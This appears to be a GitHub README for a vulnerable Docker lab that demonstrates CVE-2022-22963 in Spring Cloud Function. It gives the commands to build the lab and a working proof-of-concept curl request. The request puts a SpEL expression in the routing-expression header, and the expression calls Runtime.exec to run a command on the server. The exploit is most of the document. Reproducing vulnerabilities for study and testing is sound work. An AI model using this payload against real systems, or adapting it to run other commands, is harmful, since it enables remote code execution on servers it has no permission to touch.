Spring Cloud Function Vulnerability(CVE-2022-22963)

April 1, 2022 ยท View on GitHub

Vulnerable Application to CVE-2022-22963

CVE-2022-22963 Exploit Demo

https://user-images.githubusercontent.com/57348147/161266562-51d025f0-54d4-488f-ac50-2317e29bfbdf.mp4

Build

docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963

POC

curl -X POST  http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp

Reference